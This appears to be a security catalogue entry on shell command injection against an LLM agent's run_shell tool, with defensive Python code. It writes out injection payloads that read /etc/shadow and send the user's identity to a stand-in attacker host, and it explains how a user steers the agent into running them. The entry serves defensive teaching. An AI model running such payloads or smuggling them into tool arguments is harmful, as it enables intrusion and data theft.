Tool Abuse

Shell tool command injection

The agent exposes a run_shell tool. A user-supplied value is interpolated into a shell command string without escaping, so the shell parses the value as part of the command rather than as data.

Severity: critical

OWASP LLM: LLM06

How it works

The operator implements run_shell as 'sh -c "ls $arg"'. The user asks the agent to list a directory named '. ; cat /etc/shadow'. Because the value is concatenated into the string handed to sh -c, the shell treats ';' as a command separator and runs the second command with the agent's privileges, giving the user arbitrary command execution.

Example payload

List directory: '. ; curl attacker.example/$(whoami)'

Defenses

Pass the user value as one element of an argv array (no sh -c and no shell=True) so it reaches the program verbatim and is never parsed by a shell. Run tools in sandboxed containers with no network egress, so that even a successful injection cannot exfiltrate data.
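The following is an added example (not code from the page) that puts the vulnerable string-building form beside the argv form and a small sandboxed runner. It assumes a POSIX `ls` binary, a constructed temporary directory standing in for the agent's working tree, and a hypothetical `confine_to_sandbox` helper that goes beyond the page's two defences by also refusing paths outside a base directory.

```python
import shlex
import subprocess
import tempfile
from pathlib import Path
from typing import Optional

PAYLOAD = ". ; cat /etc/shadow"  # the page's example argument, used here as constructed input


def build_shell_string_unsafe(arg: str) -> str:
    # The vulnerable pattern: the user value is spliced into one string that
    # would be handed to `sh -c`. The shell parses ';' as a command separator,
    # so "ls ." and "cat /etc/shadow" become two commands. Built only, never run.
    return f"ls {arg}"


def build_argv(arg: str) -> list:
    # Defensive form: the value is a single argv element. With shell=False no
    # shell ever sees the ';'. "--" stops ls from reading a leading '-' as a flag.
    return ["ls", "-1", "--", arg]


def quoted_token_count(arg: str) -> int:
    # Fallback when a shell string is unavoidable: shlex.quote makes the whole
    # value one token. Returns how many tokens a POSIX-style split produces.
    return len(shlex.split(shlex.quote(arg)))


def confine_to_sandbox(arg: str, base_dir: Path) -> Optional[Path]:
    # Hypothetical extra check (not from the page): resolve the request and
    # refuse anything that is not an existing directory inside base_dir.
    base = base_dir.resolve()
    target = (base / arg).resolve()
    if target != base and base not in target.parents:
        return None  # path traversal out of the sandbox
    if not target.is_dir():
        return None  # e.g. the injected string resolves to a nonexistent path
    return target


def run_shell_tool(arg: str, base_dir: Path) -> dict:
    # Hardened run_shell: confine the path, then execute an argv array.
    target = confine_to_sandbox(arg, base_dir)
    if target is None:
        return {"ok": False, "stdout": "", "error": "refused: not a directory inside the sandbox"}
    proc = subprocess.run(
        build_argv(str(target)),
        capture_output=True,
        text=True,
        shell=False,   # the critical setting: no shell, no metacharacter parsing
        timeout=5,
    )
    return {"ok": proc.returncode == 0, "stdout": proc.stdout, "error": proc.stderr.strip()}


def demo() -> dict:
    # Constructed sandbox: a temp directory with one file, standing in for the
    # agent's working tree. Returns every result so they can be checked.
    with tempfile.TemporaryDirectory() as tmp:
        base = Path(tmp)
        (base / "report.txt").write_text("constructed sample file\n")
        benign = run_shell_tool(".", base)
        hostile = run_shell_tool(PAYLOAD, base)
        traversal = run_shell_tool("../../etc", base)
    return {
        "unsafe_string": build_shell_string_unsafe(PAYLOAD),
        "argv": build_argv(PAYLOAD),
        "quoted_tokens": quoted_token_count(PAYLOAD),
        "benign": benign,
        "hostile": hostile,
        "traversal": traversal,
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value!r}")
```

The contrast to look for when running it: `build_shell_string_unsafe` yields `ls . ; cat /etc/shadow`, which a shell would execute as two commands, while `build_argv` yields a list whose last element is the entire string `". ; cat /etc/shadow"`, which `ls` sees as one (nonexistent) path name. The hardened runner refuses the hostile value and the traversal attempt before any process starts, and lists the sandbox directory for the benign request.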

Related patterns